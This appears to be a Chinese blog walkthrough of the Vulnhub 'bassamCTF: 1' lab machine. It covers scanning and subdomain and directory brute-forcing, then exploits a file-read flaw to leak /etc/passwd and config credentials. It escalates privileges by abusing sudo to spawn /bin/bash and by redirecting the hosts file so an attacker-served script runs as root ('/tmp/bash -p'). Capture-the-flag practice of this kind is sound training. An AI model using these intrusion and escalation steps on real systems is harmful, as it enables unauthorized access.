Vulnhub: bassamCTF: 1靶机

最新推荐文章于 2024-08-12 20:25:49 发布
最新推荐文章于 2024-08-12 20:25:49 发布
阅读量188 收藏 1
点赞数
文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/132457560
版权

kali:192.168.111.111

靶机:192.168.111.210

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.210

修改hosts文件

爆破出子域名welcome

wfuzz -H 'HOST: FUZZ.bassam.ctf' -u http://192.168.111.210 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hh 422,21 -c

对子域目录爆破

gobuster dir -u http://welcome.bassam.ctf/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap,conf

index.php存在文件读取

查看/etc/passwdconfig.php

config.php中的账号密码登录ssh,账号:test,密码:test123

提权

查看test用户的历史命令发现文件MySecretPassword

find / -name 'MySecretPassword' 2> /dev/null

MySecretPassword文件内容

xxd MySecretPassword

利用/PassProgram目录中的decoder程序进行解密,得到kira用户密码:kira2003

./decoder /var/www/ctf/MySecretPassword

kira用户sudo权限

脚本内容

执行脚本的之时给脚本传入变量执行bash解释器

sudo -u bassam /home/kira/test.sh /bin/bash

bassam用户sudo权限

脚本内容

在kali创建script.sh脚本文件,写入提权命令,再修改靶机的hosts文件指向kali

提升为root

/tmp/bash -p

ctostm
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机——BASSAMCTF:1
qq_51295120的博客
02-19 4020
Vulnhub靶机——bassamctf 靶机下载链接在这 1. 主机发现: 攻击机和服务器网络适配器都设置为net模式: 识别存活的主机,发现攻击的目标: netdiscover -r 192.168.226.0/24 -i eth0 目标服务器ip为192.168.226.128 2. 信息收集 使用nmap进行全端口服务版本扫描: 操作系统识别: 3. 渗透测试: ssh弱口令并没有跑出来: hydra -l root -P /usr/share/wordlists/rockyou.txt -
vulnhub靶机bassam-CTF详细渗透过程
2401_82463993的博客
03-21 845
再到kali中搭建一个http服务器,并创建同名的script.sh,在其中写入我们要执行的命令。访问index.php的时候看到了文件下载,把扫到的文件下载下来看看。页面什么也没有,但在他的源代码里发现了一个域名bassam.ctf。这里可以通过将kali的ip添加到靶机的/etc/hosts中。确实没有其他信息了,一般网站都会有子域名,域名不同访问。PassProgram进行编码加密的,试着用里面的。另外的网页,有独立不同的内容,但不是一个新的域名。切换到/var/www/ctf/看一下这个文件。
Vulnhub靶机之KiraCTF实战
SoporAeternus12的博客
11-26 815
Vulnhub靶机之KiraCTF实战 介绍 vulnhub是一个靶机下载网站,大家可以在该网站下载靶机练练手 靶场下载地址:http://www.vulnhub.com/entry/kira-ctf,594/ 信息收集 由于本机的网段是192.168.157.0网段,所以nmap扫描 nmap -sP 192.168.157.144/24 .2是我真实机的ip地址,144是kali地址,156就是目标服务器地址了。 扫描该主机的所有端口和详细信息 nmap -A 192.168.157.156 -p-
记一次渗透测试学习(二)
qq_41252520的博客
07-08 372
文章目录KiraCTF0x0 信息收集0x1 RCE0x2 提权0x3 参考 KiraCTF 0x0 信息收集 使用netcover探测主机存活: netdiscover -r 192.168.146.0/16 Currently scanning: Finished! | Screen View: Unique Hosts
Vulnhub靶机:Kioptrix_Level1
qq_48904485的博客
03-12 921
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1(192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Vulnhub靶机:ica1
qq_48904485的博客
01-05 415
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:ica1(10.0.2.5)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/ica-1,748/
Vulnhub靶机:TOMATO_ 1
LainWith的博客
08-29 1095
系列Tomato(此系列共1台)发布日期:2020年09月14日注释:使用vmwar workstation运行虚拟机难度:低目标:取得 root 权限 + Flag主机发现端口扫描信息收集路径爬取文件包含写入日志内核漏洞枚举本地提权。...
Vulnhub 靶机: ICA: 1
weixin_69670995的博客
05-13 978
进入root目录,查看root.txt文件,这里我使用的是tac命令查看的root.txt文件,因为使用cat命令,会直接执行我们伪造的cat程序,所有我使用的是tac命令,也可以将我们伪造的cat程序删除,就可以使用cat命令执行了。扫描出来的东西很多,使用浏览器访问一下目录,没有什么有用的信息,查看一下首页的源代码,也没有什么有用的信息,一时间没有什么思路,在页面上看到是"qdPM9.2"框架,查看一下kali上有没有这个框架的漏洞。发现开着22,80,3360,使用浏览器访问80端口。
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1492
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
DLMS/COSEM中的信息安全安全密钥(中)
huaqianzkh的专栏
08-09 663
PKI是安全基础设施它创造和管理公钥证书以便于使用公钥(即非对称密钥)加密。为了实现这一目标,PKI需要执行两个基本任务:a)验证绑定的准确性后,生成和分发公钥证书将公钥绑定到其他信息;b)维护和分发未到期证书的证书状态信息。对于DLMS/COSEM,可以预料分层PKI包括如图23所示的以下组件。——根证书机构(Root-CA);——证书机构/下属机构(Sub-CA);——终端实体:不颁发证书的实体:DLMS/COSEM客户机,DLMS/COSEM服务器和第三方。
如何确保场外个股期权交易的安全
Lunasi的博客
08-07 222
只选择那些拥有合法金融牌照、受到监管机构严格监督的平台进行交易,确保在中国交易时,平台已获得证监会或相关金融监管机构的批准。:深入学习期权的基础知识,包括不同类型的期权、它们的权利和义务、定价方式以及风险特性,从而提升自我保护的能力。:在交易前,深入分析市场趋势和相关股票的基本面,评估潜在风险,并制定相应的风险管理策略。通过这些措施,投资者可以在场外个股期权交易中提高交易的安全性,有效降低不必要的风险。:选择流动性好的期权进行交易,以便在需要时能快速买卖,减少因流动性不足带来的风险。
Linux系统安全及应用(二):PAM安全认证
最新发布
shyuu的博客
08-12 675
Linux系统安全及应用(二),详解PAM安全认证
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 2万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值